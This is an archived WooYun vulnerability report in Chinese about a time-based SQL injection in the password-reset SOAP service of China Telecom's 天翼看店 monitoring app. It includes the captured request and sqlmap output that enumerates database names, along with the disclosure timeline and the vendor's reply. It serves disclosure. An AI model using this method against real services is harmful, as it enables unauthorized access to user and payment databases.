当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193189

漏洞标题:天翼看店APP某处存在延时注入

相关厂商:中国电信

漏洞作者: 我爱,你老婆

提交时间:2016-04-06 20:30

修复时间:2016-07-07 11:00

公开时间:2016-07-07 11:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

天翼看店APP某处存在延时注入

详细说明:

天翼看店是江苏鸿信系统集成有限公司推出的一款集摄像、录像、实时监控、云台控制、报警、存储为一体安防业务,针对公司、店铺等需要进行可视化管理的场所,通过客户端管理软件和互联网服务平台,以电脑和智能手机作为媒介,实现远程监控,帮助用户更好地进行安防和可视化管理。-------------------------------------------录像/摄像 1.支持前端存储历史视频回放; 3.支持本地存储视频回放。云台控制 1.WEB端,客户端提供控制云台功能,视角灵活。全面的业务——天翼看店是您*贴心的安防助手!
以上描述中存在违反广告法的内容,自动用*代替
【基本信息】
作者:查尔斯 更新时间:2015-12-02
版本:2.1 系统:Android 2.2.x以上
语言:其他

漏洞证明:

在登陆处,点击忘记密码之后,我们进行抓包
POST http://**.**.**.**:9000/cxf/MobileService HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: ""
Content-Type: text/xml;charset=utf-8
Connection: close
Accept-Encoding: gzip
Content-Length: 466
Host: **.**.**.**:9000
<v:Envelope xmlns:i="http://**.**.**.**/2001/XMLSchema-instance" xmlns:d="http://**.**.**.**/2001/XMLSchema" xmlns:c="http://**.**.**.**/soap/encoding/" xmlns:v="http://**.**.**.**/soap/envelope/"><v:Header /><v:Body><n0:getTelPasswordReq id="o0" c:root="1" xmlns:n0="http://**.**.**.**/ns1MobileServices/"><n0:MobileTel i:type="d:string">15316058351</n0:MobileTel><n0:Type i:type="d:int">2</n0:Type></n0:getTelPasswordReq></v:Body></v:Envelope>
得到一个xml的数据包
然后我们放到SQLMAP里面跑一下;
back-end DBMS: MySQL 5.0.12
[16:13:33] [INFO] fetching database names
[16:13:33] [INFO] fetching number of databases
[16:13:33] [INFO] resumed: 11
[16:13:33] [INFO] resumed: information_schema
[16:13:33] [INFO] resumed: dxptlz
[16:13:33] [INFO] resumed: mysql
[16:13:33] [INFO] resumed: pay
[16:13:33] [INFO] resumed: performanc\x04A_schena
[16:13:33] [INFO] resumed: test
[16:13:33] [INFO] resumed: tzkdnew\x02
[16:13:33] [INFO] resumed: tykdoss
[16:13:33] [INFO] resumed: tykdportaz
[16:13:33] [INFO] resumed: tykdpublic
[16:13:33] [INFO] resumed: tykjportal
available databases [11]:
`performancA_schena`
`tzkdnew`
dxptlz
information_schema
mysql
pay
test
tykdoss
tykdportaz
tykdpublic
tykjportal
总共有是一个表,本来想列出数据库中的用户信息等等,但是鉴于该注入是延时注入,并且延时最慢的时候要将近60秒,时间太长,所以就没有列出。
但是基本可以从数据库名字中就已经可以确定了,pay中可能存在敏感信息。

修复方案:

= =

版权声明:转载请注明来源 我爱,你老婆@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-08 10:56

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无